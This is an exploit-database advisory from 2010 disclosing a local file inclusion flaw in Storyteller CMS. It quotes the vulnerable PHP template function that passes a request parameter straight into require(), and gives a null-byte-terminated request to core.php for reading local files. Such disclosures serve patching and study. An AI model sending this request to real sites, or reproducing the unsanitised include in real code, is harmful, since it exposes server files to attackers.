Storyteller CMS (var) Local File Inclusion Vulnerability

2010-09-14T00:00:00
ID 1337DAY-ID-14071
Type zdt
Reporter BorN To K!LL
Modified 2010-09-14T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ========================================================
Storyteller CMS (var) Local File Inclusion Vulnerability
========================================================

==
[~] Title: Storyteller CMS (var) Local File Include Vuln
[~] Version: n/a
[~] Link: http://www.esselbach.com/freeware.php?id=2
==
[~] Author: BorN To K!LL - h4ck3r
[~] Contact: [email protected]
==
[~] Vuln code:
in GetTemplate function , line 113 to 127
 
    function GetTemplate($var)
    {              
        if (file_exists("templates/$var.tmp.php"))
        {
            require("templates/$var.tmp.php");
        }
        else
        {
            die ("Error: Can't open template $var");
        }       
        return $EST_TEMPLATE;                
    }
 
[~] 3xploit:
/core.php?var=[Local-File]%00
==
[#] Greetings:
 
Dr.2 , darkc0de team , inj3ct0r's Community , and all ma friends ,,
==



#  0day.today [2018-01-24]  #